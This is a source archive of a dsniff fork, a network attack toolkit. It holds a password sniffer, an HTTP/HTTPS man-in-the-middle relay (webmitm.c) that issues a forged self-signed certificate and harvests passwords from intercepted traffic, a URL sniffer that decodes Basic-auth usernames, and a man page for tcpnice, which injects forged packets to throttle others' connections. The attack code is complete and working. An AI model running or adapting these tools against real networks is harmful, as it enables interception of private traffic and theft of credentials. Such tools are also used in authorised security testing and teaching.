hackerschoice-dsniff-a17510d/0000775000175000017500000000000015105626144016012 5ustar epsilonepsilonhackerschoice-dsniff-a17510d/decode_telnet.c0000664000175000017500000000112215105626144020750 0ustar epsilonepsilon/* * decode_telnet.c * * Telnet. * * Copyright (c) 2000 Dug Song * * $Id: decode_telnet.c,v 1.5 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include "options.h" #include "decode.h" int decode_telnet(u_char *buf, int len, u_char *obuf, int olen) { if ((len = strip_telopts(buf, len)) == 0) return (0); if (!is_ascii_string(buf, len)) return (0); if (strip_lines(buf, Opt_lines) < 2) return (0); strlcpy(obuf, buf, olen); return (strlen(obuf)); } hackerschoice-dsniff-a17510d/dsniff.c0000664000175000017500000001640415105626144017434 0ustar epsilonepsilon/* * dsniff.c * * Password sniffer, because DrHoney wanted one. * * This is intended for demonstration purposes and educational use only. * * Copyright (c) 2000 Dug Song * * $Id: dsniff.c,v 1.69 2001/03/15 08:33:03 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include "options.h" #include "pathnames.h" #include "pcaputil.h" #include "trigger.h" #include "record.h" #include "env2argv.h" #define MAX_LINES 6 #define MIN_SNAPLEN 1024 int Opt_client = 0; int Opt_debug = 0; u_short Opt_dns = 0; int Opt_magic = 1; int Opt_read = 0; int Opt_write = 0; int Opt_snaplen = MIN_SNAPLEN; int Opt_lines = MAX_LINES; int Opt_verbose = 0; int Opt_show_dups = 0; int Opt_color = 0; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: dsniff [-cdamDNPCv] [-i interface | -p pcapfile] [-s snaplen]\n" " [-f services] [-t trigger[,...]]\n" " [pcap filter]\n" " -c Half-duplex TCP stream assembly\n" " -a Show duplicates\n" " -v Verbose. Show banners\n" " -d Enable debugging mode\n" " -D Disable DPI. Only decode known ports.\n" " -m Force DPI also on known ports (e.g. ignore /etc/services).\n" " For example, -m will detect SSH on port 443 (https).\n" " -C Force color output even if not a TTY (disable color: dsniff|cat)\n" " -N Resolve IP addresses to hostname\n" " -P Enable promisc mode\n" " -t <...> Force a decoding method for a specific port/protocol.\n" " Example: Decode IMAP on port 8143: -t 8143/tcp=imap\n" " -i Specify the interface to listen on\n" " -p Read from pcap file\n" " -s Analyze at most the first snaplen of each TCP connection [default: %d]\n" #ifdef WITH_BERKELEY_DB " -w Write sniffed sessions to db rather then printing them out\n" " -r Read sniffed sessions from a db created with the -w option\n" #endif "\n" " Example:\n" " dsniff -i eth0 -C >log.txt\n", MIN_SNAPLEN); exit(1); } static void sig_hup(int sig) { trigger_dump(); } static void sig_die(int sig) { record_close(); exit(0); } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } static int get_all_ifaces(struct ifreq **, int *); static unsigned int get_addr_from_ifreq(struct ifreq *); int all_local_ipaddrs_chksum_disable() { struct ifreq *ifaces; int ifaces_count; int i, ind = 0; struct nids_chksum_ctl *ctlp; unsigned int tmp; if (!get_all_ifaces(&ifaces, &ifaces_count)) return -1; ctlp = (struct nids_chksum_ctl *) malloc(ifaces_count * sizeof(struct nids_chksum_ctl)); if (!ctlp) return -1; for (i = 0; i < ifaces_count; i++) { tmp = get_addr_from_ifreq(ifaces + i); if (tmp) { ctlp[ind].netaddr = tmp; ctlp[ind].mask = inet_addr("255.255.255.255"); ctlp[ind].action = NIDS_DONT_CHKSUM; ind++; } } free(ifaces); nids_register_chksum_ctl(ctlp, ind); } /* helper functions for Example 2 */ unsigned int get_addr_from_ifreq(struct ifreq *iface) { if (iface->ifr_addr.sa_family == AF_INET) return ((struct sockaddr_in *) &(iface->ifr_addr))-> sin_addr.s_addr; return 0; } static int get_all_ifaces(struct ifreq **ifaces, int *count) { int ifaces_size = 8 * sizeof(struct ifreq); struct ifconf param; int sock; unsigned int i; *ifaces = malloc(ifaces_size); sock = socket(PF_INET, SOCK_DGRAM, IPPROTO_IP); if (sock <= 0) return 0; for (;;) { param.ifc_len = ifaces_size; param.ifc_req = *ifaces; if (ioctl(sock, SIOCGIFCONF, ¶m)) goto err; if (param.ifc_len < ifaces_size) break; free(*ifaces); ifaces_size *= 2; ifaces = malloc(ifaces_size); } *count = param.ifc_len / sizeof(struct ifreq); close(sock); return 1; err: close(sock); return 0; } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; char *services, *savefile, *triggers, *magics; int c; env2argv(&argc, &argv); services = savefile = triggers = magics = NULL; if (isatty(STDOUT_FILENO)) Opt_color = 1; nids_params.promisc = 0; while ((c = getopt(argc, argv, "PCvcdDaM:f:i:mNnp:r:s:t:w:h?V")) != -1) { switch (c) { case 'P': nids_params.promisc = 1; break; case 'C': Opt_color = 2; // FORCED break; case 'v': Opt_verbose = 1; break; case 'c': Opt_client = 1; break; case 'a': Opt_show_dups++; break; case 'd': Opt_debug++; break; case 'f': services = optarg; break; case 'M': magics = optarg; break; case 'i': nids_params.device = optarg; break; case 'D': Opt_magic = 0; break; case 'm': Opt_magic++; break; case 'N': Opt_dns = 1; break; case 'n': // compat mode Opt_dns = 0; break; case 'p': nids_params.filename = optarg; break; case 's': if ((Opt_snaplen = atoi(optarg)) == 0) usage(); break; case 't': triggers = optarg; trigger_init_list(triggers); break; #ifdef WITH_BERKELEY_DB case 'r': Opt_read = 1; savefile = optarg; break; case 'w': Opt_write = 1; savefile = optarg; break; #endif default: usage(); } } argc -= optind; argv += optind; if (Opt_read && Opt_write) usage(); if (Opt_write && (Opt_color < 2)) Opt_color = 0; // Disable color for to DB. if (!record_init(savefile)) err(1, "record_init"); signal(SIGHUP, sig_hup); signal(SIGINT, sig_die); signal(SIGTERM, sig_die); if (Opt_read) { record_dump(); record_close(); exit(0); } if (argc != 0) nids_params.pcap_filter = copy_argv(argv); nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; nids_params.n_tcp_streams = 8 * 1024; nids_params.tcp_workarounds = 1; if (!nids_init()) { record_close(); errx(1, "nids_init: %s", nids_errbuf); } // HERE: Manual -t triggers have already been loaded. // Add DPI magics if (Opt_magic >= 1) trigger_init_magic(magics); if (Opt_magic >= 2) fprintf(stderr, "\ WARNING: DPI (-m) wont detect some protocols. Use -t to assist the DPI.\n\ Example: To decode IMAP on port 8143 use '-t 8143/tcp=imap'."); // Add known ports to triggers unless DPI is forced on all ports (-m) if (Opt_magic != 2) trigger_init_services(services); nids_register_ip(trigger_ip); nids_register_ip(trigger_udp); if (Opt_client) { nids_register_ip(trigger_tcp_raw); signal(SIGALRM, trigger_tcp_raw_timeout); alarm(TRIGGER_TCP_RAW_TIMEOUT); } else nids_register_tcp(trigger_tcp); if (nids_params.pcap_filter != NULL) { if (nids_params.filename == NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else { warnx("using %s [%s]", nids_params.filename, nids_params.pcap_filter); } } else { if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } } // all_local_ipaddrs_chksum_disable(); // In Docker containers the chksum is often wrong even if not send from any // of the local NICs (local to the PHY but not visible by the container).... struct nids_chksum_ctl chksum_conf = { 0, 0, NIDS_DONT_CHKSUM }; nids_register_chksum_ctl(&chksum_conf, 1); nids_run(); /* NOTREACHED */ exit(0); } hackerschoice-dsniff-a17510d/webmitm.c0000664000175000017500000002451115105626144017625 0ustar epsilonepsilon/* * webmitm.c * * HTTP / HTTPS monkey-in-the-middle. * * Copyright (c) 2000 Dug Song * * $Id: webmitm.c,v 1.11 2001/03/17 08:35:05 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "buf.h" #include "record.h" #define CERT_FILE "webmitm.crt" #define MAX_LINES 6 #define MIN_SNAPLEN 1024 int Opt_quiet = 0; int Opt_debug = 0; int Opt_read = 0; int Opt_write = 0; int Opt_dns = 1; int Opt_magic = 0; int Opt_snaplen = MIN_SNAPLEN; int Opt_lines = MAX_LINES; int Opt_verbose = 0; int Opt_show_dups = 0; int Opt_color = 0; int http_fd, https_fd; int client_fd, server_fd; SSL_CTX *ssl_client_ctx, *ssl_server_ctx; SSL *ssl_client, *ssl_server; struct sockaddr_in csin, ssin; int do_ssl, sig_pipe[2]; in_addr_t static_host = 0; static libnet_t *l; extern int decode_http(char *, int, char *, int); static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: webmitm [-d] [host]\n"); exit(1); } static void sig_chld(int signal) { if (write(sig_pipe[1], "x", 1) < 0) warn("sig_chld"); } static void sig_int(int signal) { close(http_fd); close(https_fd); record_close(); exit(0); } static void reap_child(void) { pid_t pid, status; while ((pid = waitpid(-1, &status, WNOHANG)) > 0) { if (Opt_debug) warnx("child %d terminated with status %d", pid, status); } } static void err_ssl(int eval, char *msg) { char buf[128]; ERR_error_string(ERR_get_error(), buf); err(eval, "%s", buf); } static void grep_passwords(char *buf, int len) { char obuf[1024]; if ((len = decode_http(buf, len, obuf, sizeof(obuf))) > 0) { record(csin.sin_addr.s_addr, ssin.sin_addr.s_addr, IPPROTO_TCP, ntohs(csin.sin_port), ntohs(ssin.sin_port), "http", obuf, len); } } static void cert_init(void) { struct stat sb; /* XXX - i am cheap and dirty */ if (stat(CERT_FILE, &sb) < 0) { if (system("openssl genrsa -out " CERT_FILE " 1024") != 0) err(1, "system"); if (system("openssl req -new -key " CERT_FILE " -out " CERT_FILE ".csr") != 0) err(1, "system"); if (system("openssl x509 -req -days 365 -in " CERT_FILE ".csr" " -signkey " CERT_FILE " -out " CERT_FILE ".new")) err(1, "system"); if (system("cat " CERT_FILE ".new >> " CERT_FILE) != 0) err(1, "system"); unlink(CERT_FILE ".new"); unlink(CERT_FILE ".csr"); warnx("certificate generated"); } } static void client_init(void) { if (fcntl(client_fd, F_SETFL, 0) < 0) err(1, "fcntl"); if (do_ssl) { ssl_client = SSL_new(ssl_client_ctx); SSL_set_fd(ssl_client, client_fd); if (SSL_accept(ssl_client) == 0) err_ssl(1, "SSL_accept"); } } static int client_read(char *buf, int size) { if (do_ssl) { return (SSL_read(ssl_client, buf, size)); } return (read(client_fd, buf, size)); } static int client_request(char *buf, int size) { struct buf *b, req; char *p; int i, reqlen; memset(&req, 0, sizeof(req)); req.base = buf; req.size = size; reqlen = 0; /* XXX - i feel cheap and dirty */ while ((i = client_read(req.base + req.end, req.size - req.end)) > 0) { req.end += i; if (reqlen && buf_len(&req) >= reqlen) { break; } else if ((i = buf_index(&req, "\r\n\r\n", 4)) > 0) { reqlen = i + 4; b = buf_tok(&req, NULL, reqlen); buf_rewind(&req); if ((i = buf_index(b, "\r\nContent-length: ", 18)) < 0) break; buf_skip(b, i + 18); b = buf_getword(b, "\r\n", 2); p = buf_strdup(b); buf_free(b); reqlen += atoi(p); free(p); } } reqlen = buf_len(&req); return (reqlen); } static int client_write(char *buf, int size) { if (do_ssl) { return (SSL_write(ssl_client, buf, size)); } return (write(client_fd, buf, size)); } static void client_close(void) { if (do_ssl) { SSL_free(ssl_client); } close(client_fd); } static void server_init(char *buf, int size) { struct buf *word, msg; char *vhost; int i; memset(&ssin, 0, sizeof(ssin)); ssin.sin_family = AF_INET; ssin.sin_port = do_ssl ? htons(443) : htons(80); if (static_host == 0) { buf_init(&msg, buf, size); if ((i = buf_index(&msg, "\r\nHost: ", 8)) > 0) { buf_skip(&msg, i + 8); word = buf_tok(&msg, "\r\n", 2); vhost = buf_strdup(word); } else { i = buf_index(&msg, " http://", 8); if (i < 0 || i > 8) { errx(1, "no virtual host in request"); } buf_skip(&msg, i + 8); word = buf_tok(&msg, "/", 1); vhost = buf_strdup(word); } ssin.sin_addr.s_addr = libnet_name2addr4(l, vhost, LIBNET_RESOLVE); free(vhost); if (ssin.sin_addr.s_addr == ntohl(INADDR_LOOPBACK) || ssin.sin_addr.s_addr == -1) { errx(1, "couldn't resolve host in request"); } } else ssin.sin_addr.s_addr = static_host; if ((server_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) err(1, "socket"); if (connect(server_fd, (struct sockaddr *)&ssin, sizeof(ssin)) < 0) err(1, "connect"); if (do_ssl) { ssl_server_ctx = SSL_CTX_new(SSLv23_client_method()); ssl_server = SSL_new(ssl_server_ctx); SSL_set_connect_state(ssl_server); SSL_set_fd(ssl_server, server_fd); if (SSL_connect(ssl_server) < 0) err_ssl(1, "SSL_connect"); } } static int server_read(char *buf, int size) { if (do_ssl) { return (SSL_read(ssl_server, buf, size)); } return (read(server_fd, buf, size)); } static int server_write(char *buf, int size) { if (do_ssl) { return (SSL_write(ssl_server, buf, size)); } return (write(server_fd, buf, size)); } static void server_close(void) { if (do_ssl) { SSL_free(ssl_server); } close(server_fd); } static void mitm_init(void) { struct sockaddr_in sin; int i = 1; if (pipe(sig_pipe) < 0) err(1, "pipe"); if ((http_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0 || (https_fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) err(1, "socket"); if (setsockopt(http_fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) < 0 || setsockopt(https_fd, SOL_SOCKET, SO_REUSEADDR, &i, sizeof(i)) < 0) err(1, "setsockopt"); memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = INADDR_ANY; sin.sin_port = htons(80); if (bind(http_fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) err(1, "bind"); sin.sin_port = htons(443); if (bind(https_fd, (struct sockaddr *)&sin, sizeof(sin)) < 0) err(1, "bind"); if (listen(http_fd, 3) < 0 || listen(https_fd, 3) < 0) err(1, "listen"); SSL_library_init(); SSL_load_error_strings(); ssl_client_ctx = SSL_CTX_new(SSLv23_server_method()); if (SSL_CTX_use_certificate_file(ssl_client_ctx, CERT_FILE, SSL_FILETYPE_PEM) == 0) err_ssl(1, "SSL_CTX_use_certificate_file"); if (SSL_CTX_use_PrivateKey_file(ssl_client_ctx, CERT_FILE, SSL_FILETYPE_PEM) == 0) err_ssl(1, "SSL_CTX_use_PrivateKey_file"); if (SSL_CTX_check_private_key(ssl_client_ctx) == 0) err_ssl(1, "SSL_CTX_check_private_key"); } static void mitm_child(void) { u_char buf[8192]; fd_set fds; int i; if (Opt_debug) warnx("new connection from %s.%d", inet_ntoa(csin.sin_addr), ntohs(csin.sin_port)); client_init(); if ((i = client_request(buf, sizeof(buf))) < 0) err(1, "client_request"); if (Opt_debug) warnx("%d bytes from %s", i, inet_ntoa(csin.sin_addr)); if (Opt_debug > 1) write(STDERR_FILENO, buf, i); server_init(buf, i); if (server_write(buf, i) != i) err(1, "server_write"); if (!Opt_quiet) grep_passwords(buf, i); for (;;) { FD_ZERO(&fds); FD_SET(client_fd, &fds); FD_SET(server_fd, &fds); i = MAX(client_fd, server_fd) + 1; if (select(i, &fds, 0, 0, 0) < 0) { if (errno != EINTR) break; } if (FD_ISSET(client_fd, &fds)) { i = sizeof(buf); if ((i = client_request(buf, i)) <= 0) break; if (Opt_debug) warnx("%d bytes from %s", i, inet_ntoa(csin.sin_addr)); if (Opt_debug > 1) write(STDERR_FILENO, buf, i); if (server_write(buf, i) != i) break; if (!Opt_quiet) grep_passwords(buf, i); } else if (FD_ISSET(server_fd, &fds)) { i = sizeof(buf); if ((i = server_read(buf, i)) <= 0) break; if (Opt_debug) warnx("%d bytes from %s", i, inet_ntoa(ssin.sin_addr)); if (Opt_debug > 2) write(STDERR_FILENO, buf, i); if (client_write(buf, i) != i) break; } else err(1, "select"); } server_close(); client_close(); } static void mitm_run(void) { fd_set fds; int i; signal(SIGCHLD, sig_chld); signal(SIGINT, sig_int); if (fcntl(sig_pipe[0], F_SETFL, O_NONBLOCK) < 0 || fcntl(sig_pipe[1], F_SETFL, O_NONBLOCK) < 0) err(1, "fcntl"); if (fcntl(http_fd, F_SETFL, O_NONBLOCK) < 0 || fcntl(https_fd, F_SETFL, O_NONBLOCK) < 0) err(1, "fcntl"); for (;;) { FD_ZERO(&fds); FD_SET(http_fd, &fds); FD_SET(https_fd, &fds); FD_SET(sig_pipe[0], &fds); i = MAX(http_fd, https_fd); i = MAX(sig_pipe[0], i); if (select(i + 1, &fds, 0, 0, 0) < 0) { if (errno != EINTR) err(1, "select"); } i = sizeof(csin); if (FD_ISSET(sig_pipe[0], &fds)) { while (read(sig_pipe[0], &i, 1) == 1) ; /* empty non-blocking pipe */ reap_child(); continue; } if (FD_ISSET(http_fd, &fds)) { client_fd = accept(http_fd, (struct sockaddr *)&csin, &i); do_ssl = 0; } else if (FD_ISSET(https_fd, &fds)) { client_fd = accept(https_fd, (struct sockaddr *)&csin, &i); do_ssl = 1; } else errx(1, "select failure"); if (client_fd < 0) { if (errno != EINTR && errno != EWOULDBLOCK) err(1, "accept"); } if (fork() == 0) { close(http_fd); mitm_child(); exit(0); } close(client_fd); } } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; char libnet_ebuf[LIBNET_ERRBUF_SIZE]; while ((c = getopt(argc, argv, "dh?V")) != -1) { switch (c) { case 'd': Opt_debug++; break; default: usage(); } } argc -= optind; argv += optind; if ((l = libnet_init(LIBNET_LINK, NULL, libnet_ebuf)) == NULL) errx(1, "%s", libnet_ebuf); if (argc == 1) { if ((static_host = libnet_name2addr4(l, argv[0], LIBNET_RESOLVE)) == -1) usage(); } else if (argc != 0) usage(); record_init(NULL); cert_init(); mitm_init(); if (static_host == 0) { warnx("relaying transparently"); } else warnx("relaying to %s", argv[0]); mitm_run(); exit(0); } hackerschoice-dsniff-a17510d/urlsnarf.c0000664000175000017500000001704515105626144020021 0ustar epsilonepsilon/* * urlsnarf.c * * Sniff the network for HTTP request URLs, output in CLF format. * * Copyright (c) 1999 Dug Song * * $Id: urlsnarf.c,v 1.35 2001/03/15 09:26:13 dugsong Exp $ */ #include "config.h" #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pcaputil.h" #include "buf.h" #include "base64.h" #define DEFAULT_PCAP_FILTER "tcp port 80 or port 8080 or port 3128" u_short Opt_dns = 1; int Opt_invert = 0; regex_t *pregex = NULL; time_t tt = 0; static void usage(void) { fprintf(stderr, "Version: " VERSION "\n" "Usage: urlsnarf [-n] [-i interface | -p pcapfile] [[-v] pattern [expression]]\n"); exit(1); } static int regex_match(char *string) { return (pregex == NULL || ((regexec(pregex, string, 0, NULL, 0) == 0) ^ Opt_invert)); } static char * timestamp(void) { static char tstr[32], sign; struct tm *t, gmt; int days, hours, tz, len; if (!nids_params.filename) { tt = time(NULL); } gmt = *gmtime(&tt); t = localtime(&tt); days = t->tm_yday - gmt.tm_yday; hours = ((days < -1 ? 24 : 1 < days ? -24 : days * 24) + t->tm_hour - gmt.tm_hour); tz = hours * 60 + t->tm_min - gmt.tm_min; len = strftime(tstr, sizeof(tstr), "%d/%b/%Y:%X", t); if (len < 0 || len > sizeof(tstr) - 5) return (NULL); if (tz < 0) { sign = '-'; tz = -tz; } else sign = '+'; snprintf(tstr + len, sizeof(tstr) - len, " %c%.2d%.2d", sign, tz / 60, tz % 60); return (tstr); } static char * escape_log_entry(char *string) { char *out; unsigned char *c, *o; size_t len; if (!string) return NULL; /* Determine needed length */ for (c = string, len = 0; *c; c++) { if ((*c < 32) || (*c >= 128)) len += 4; else if ((*c == '"') || (*c =='\\')) len += 2; else len++; } out = malloc(len+1); if (!out) return NULL; for (c = string, o = out; *c; c++, o++) { if ((*c < 32) || (*c >= 128)) { snprintf(o, 5, "\\x%02x", *c); o += 3; } else if ((*c == '"') || ((*c =='\\'))) { *(o++) = '\\'; *o = *c; } else { *o = *c; } } out[len]='\0'; return out; } static int process_http_request(struct tuple4 *addr, u_char *data, int len) { struct buf *msg, buf; char *p, *req, *uri, *user, *vhost, *referer, *agent; int i; buf_init(&buf, data, len); while ((i = buf_index(&buf, "\r\n\r\n", 4)) >= 0) { msg = buf_tok(&buf, NULL, i); msg->base[msg->end] = '\0'; buf_skip(&buf, 4); if (!regex_match(buf_ptr(msg))) continue; if ((req = strtok(buf_ptr(msg), "\r\n")) == NULL) continue; if (strncmp(req, "GET ", 4) != 0 && strncmp(req, "POST ", 5) != 0 && strncmp(req, "CONNECT ", 8) != 0) continue; if ((uri = strchr(req, ' ')) == NULL) continue; *uri++ = '\0'; if (strncmp(uri, "http://", 7) == 0) { for (uri += 7; *uri != '/'; uri++) ; } user = vhost = referer = agent = NULL; while ((p = strtok(NULL, "\r\n")) != NULL) { if (strncasecmp(p, "Authorization: Basic ", 21) == 0) { p += 21; i = base64_pton(p, p, strlen(p)); p[i] = '\0'; user = p; if ((p = strchr(p, ':')) != NULL) *p = '\0'; } else if (strncasecmp(p, "Host: ", 6) == 0) { vhost = p + 6; } else if (strncasecmp(p, "Referer: ", 9) == 0) { referer = p + 9; } else if (strncasecmp(p, "User-Agent: ", 12) == 0) { agent = p + 12; } else if (strncasecmp(p, "Content-length: ", 16) == 0) { i = atoi(p + 16); buf_tok(NULL, NULL, i); } } user = escape_log_entry(user); vhost = escape_log_entry(vhost); uri = escape_log_entry(uri); referer = escape_log_entry(referer); agent = escape_log_entry(agent); printf("%s - %s [%s] \"%s http://%s%s\" - - \"%s\" \"%s\"\n", libnet_addr2name4(addr->saddr, Opt_dns), (user?user:"-"), timestamp(), req, (vhost?vhost:libnet_addr2name4(addr->daddr, Opt_dns)), uri, (referer?referer:"-"), (agent?agent:"-")); free(user); free(vhost); free(uri); free(referer); free(agent); } fflush(stdout); return (len - buf_len(&buf)); } static void sniff_http_client(struct tcp_stream *ts, void **yoda) { int i; switch (ts->nids_state) { case NIDS_JUST_EST: ts->server.collect = 1; case NIDS_DATA: if (ts->server.count_new != 0) { i = process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); nids_discard(ts, i); } break; default: if (ts->server.count != 0) { process_http_request(&ts->addr, ts->server.data, ts->server.count - ts->server.offset); } break; } } static void null_syslog(int type, int errnum, struct ip *iph, void *data) { } int main(int argc, char *argv[]) { extern char *optarg; extern int optind; int c; struct nids_chksum_ctl chksum_ctl; while ((c = getopt(argc, argv, "i:p:nvh?V")) != -1) { switch (c) { case 'i': nids_params.device = optarg; break; case 'p': nids_params.filename = optarg; break; case 'n': Opt_dns = 0; break; case 'v': Opt_invert = 1; break; default: usage(); } } argc -= optind; argv += optind; if (argc > 0 && strlen(argv[0])) { if ((pregex = (regex_t *) malloc(sizeof(*pregex))) == NULL) err(1, "malloc"); if (regcomp(pregex, argv[0], REG_EXTENDED|REG_NOSUB) != 0) errx(1, "invalid regular expression"); } if (argc > 1) { nids_params.pcap_filter = copy_argv(argv + 1); } else nids_params.pcap_filter = DEFAULT_PCAP_FILTER; nids_params.scan_num_hosts = 0; nids_params.syslog = null_syslog; if (!nids_init()) errx(1, "%s", nids_errbuf); nids_register_tcp(sniff_http_client); if (nids_params.pcap_filter != NULL) { if (nids_params.filename == NULL) { warnx("listening on %s [%s]", nids_params.device, nids_params.pcap_filter); } else { warnx("using %s [%s]", nids_params.filename, nids_params.pcap_filter); } } else { if (nids_params.filename == NULL) { warnx("listening on %s", nids_params.device); } else { warnx("using %s", nids_params.filename); } } chksum_ctl.netaddr = 0; chksum_ctl.mask = 0; chksum_ctl.action = NIDS_DONT_CHKSUM; nids_register_chksum_ctl(&chksum_ctl, 1); pcap_t *p; char pcap_errbuf[PCAP_ERRBUF_SIZE]; if (nids_params.filename == NULL) { /* adapted from libnids.c:open_live() */ if (strcmp(nids_params.device, "all") == 0) nids_params.device = "any"; p = pcap_open_live(nids_params.device, 16384, (nids_params.promisc != 0), 0, pcap_errbuf); if (!p) { fprintf(stderr, "pcap_open_live(): %s\n", pcap_errbuf); exit(1); } } else { p = pcap_open_offline(nids_params.filename, pcap_errbuf); if (!p) { fprintf(stderr, "pcap_open_offline(%s): %s\n", nids_params.filename, pcap_errbuf); } } struct pcap_pkthdr *h; u_char *d; int rc; while ((rc = pcap_next_ex(p, &h, (const u_char **)&d)) == 1) { tt = h->ts.tv_sec; nids_pcap_handler(NULL, h, d); } switch (rc) { case(-2): /* end of pcap file */ case(0): /* timeout on live capture */ break; case(-1): default: fprintf(stderr, "rc = %i\n", rc); pcap_perror(p, "pcap_read_ex()"); exit(1); break; } exit(0); } hackerschoice-dsniff-a17510d/base64.h0000664000175000017500000000032415105626144017246 0ustar epsilonepsilon/* * base64.h * * Base-64 routines. * * $Id: base64.h,v 1.2 2001/03/15 08:33:05 dugsong Exp $ */ #ifndef BASE64_H #define BASE64_H int base64_pton(char const *, u_char *, size_t); #endif /* BASE64_H */ hackerschoice-dsniff-a17510d/tcpnice.80000664000175000017500000000144615105626144017535 0ustar epsilonepsilon.TH TCPNICE 8 .ad .fi .SH NAME tcpnice \- slow down TCP connections on a LAN .SH SYNOPSIS .na .nf .fi \fBtcpnice\fR [\fB-A\fR] [\fB-I\fR] [\fB-M\fR] [\fB-i \fIinterface\fR] \fIexpression\fR .SH DESCRIPTION .ad .fi \fBtcpnice\fR slows down specified TCP connections on a LAN via "active" traffic shaping. .SH OPTIONS .IP \fB-A\fR Inject TCP tiny window advertisements. .IP \fB-I\fR Inject ICMP source quench replies. .IP \fB-M\fR Inject ICMP fragmentation-needed replies with tiny next-hop MTUs. .IP "\fB-i \fIinterface\fR" Specify the interface to listen on. .IP \fIexpression\fR Specify a tcpdump(8) filter expression to select the connections to slow down. .LP If no attack type is given, all attacks will be enabled. .SH "SEE ALSO" dsniff(8), tcpkill(8) .SH AUTHOR .na .nf Dug Song hackerschoice-dsniff-a17510d/env2argv.h0000664000175000017500000000017515105626144017720 0ustar epsilonepsilon#ifndef __ENV2ARGV_H__ #define __ENV2ARGV_H__ 1 void env2argv(int *argcptr, char **argvptr[]); #endif /* __ENV2ARGV_H__ */ hackerschoice-dsniff-a17510d/mount.h0000664000175000017500000000735015105626144017332 0ustar epsilonepsilon/* * Please do not edit this file. * It was generated using rpcgen. */ #ifndef _MOUNT_H_RPCGEN #define _MOUNT_H_RPCGEN #include #ifdef __cplusplus extern "C" { #endif #define MNTPATHLEN 1024 #define MNTNAMLEN 255 #define FHSIZE 32 #define FHSIZE3 64 typedef char fhandle[FHSIZE]; typedef struct { u_int fhandle3_len; char *fhandle3_val; } fhandle3; struct fhstatus { u_int fhs_status; union { fhandle fhs_fhandle; } fhstatus_u; }; typedef struct fhstatus fhstatus; #define fhs_fh fhstatus_u.fhs_fhandle enum mountstat3 { MNT_OK = 0, MNT3ERR_PERM = 1, MNT3ERR_NOENT = 2, MNT3ERR_IO = 5, MNT3ERR_ACCES = 13, MNT3ERR_NOTDIR = 20, MNT3ERR_INVAL = 22, MNT3ERR_NAMETOOLONG = 63, MNT3ERR_NOTSUPP = 10004, MNT3ERR_SERVERFAULT = 10006, }; typedef enum mountstat3 mountstat3; struct mountres3_ok { fhandle3 fhandle; struct { u_int auth_flavors_len; int *auth_flavors_val; } auth_flavors; }; typedef struct mountres3_ok mountres3_ok; struct mountres3 { mountstat3 fhs_status; union { mountres3_ok mountinfo; } mountres3_u; }; typedef struct mountres3 mountres3; typedef char *dirpath; #define MOUNTPROG 100005 #define MOUNTVERS 1 #if defined(__STDC__) || defined(__cplusplus) #define MOUNTPROC_NULL 0 extern void * mountproc_null_1(void *, CLIENT *); extern void * mountproc_null_1_svc(void *, struct svc_req *); #define MOUNTPROC_MNT 1 extern fhstatus * mountproc_mnt_1(dirpath *, CLIENT *); extern fhstatus * mountproc_mnt_1_svc(dirpath *, struct svc_req *); extern int mountprog_1_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ #define MOUNTPROC_NULL 0 extern void * mountproc_null_1(); extern void * mountproc_null_1_svc(); #define MOUNTPROC_MNT 1 extern fhstatus * mountproc_mnt_1(); extern fhstatus * mountproc_mnt_1_svc(); extern int mountprog_1_freeresult (); #endif /* K&R C */ #define MOUNTVERS_POSIX 2 #if defined(__STDC__) || defined(__cplusplus) extern void * mountproc_null_2(void *, CLIENT *); extern void * mountproc_null_2_svc(void *, struct svc_req *); extern fhstatus * mountproc_mnt_2(dirpath *, CLIENT *); extern fhstatus * mountproc_mnt_2_svc(dirpath *, struct svc_req *); extern int mountprog_2_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ extern void * mountproc_null_2(); extern void * mountproc_null_2_svc(); extern fhstatus * mountproc_mnt_2(); extern fhstatus * mountproc_mnt_2_svc(); extern int mountprog_2_freeresult (); #endif /* K&R C */ #define MOUNTVERS3 3 #if defined(__STDC__) || defined(__cplusplus) extern void * mountproc_null_3(void *, CLIENT *); extern void * mountproc_null_3_svc(void *, struct svc_req *); extern mountres3 * mountproc_mnt_3(dirpath *, CLIENT *); extern mountres3 * mountproc_mnt_3_svc(dirpath *, struct svc_req *); extern int mountprog_3_freeresult (SVCXPRT *, xdrproc_t, caddr_t); #else /* K&R C */ extern void * mountproc_null_3(); extern void * mountproc_null_3_svc(); extern mountres3 * mountproc_mnt_3(); extern mountres3 * mountproc_mnt_3_svc(); extern int mountprog_3_freeresult (); #endif /* K&R C */ /* the xdr functions */ #if defined(__STDC__) || defined(__cplusplus) extern bool_t xdr_fhandle (XDR *, fhandle); extern bool_t xdr_fhandle3 (XDR *, fhandle3*); extern bool_t xdr_fhstatus (XDR *, fhstatus*); extern bool_t xdr_mountstat3 (XDR *, mountstat3*); extern bool_t xdr_mountres3_ok (XDR *, mountres3_ok*); extern bool_t xdr_mountres3 (XDR *, mountres3*); extern bool_t xdr_dirpath (XDR *, dirpath*); #else /* K&R C */ extern bool_t xdr_fhandle (); extern bool_t xdr_fhandle3 (); extern bool_t xdr_fhstatus (); extern bool_t xdr_mountstat3 (); extern bool_t xdr_mountres3_ok (); extern bool_t xdr_mountres3 (); extern bool_t xdr_dirpath (); #endif /* K&R C */ #ifdef __cplusplus } #endif #endif /* !_MOUNT_H_RPCGEN */ 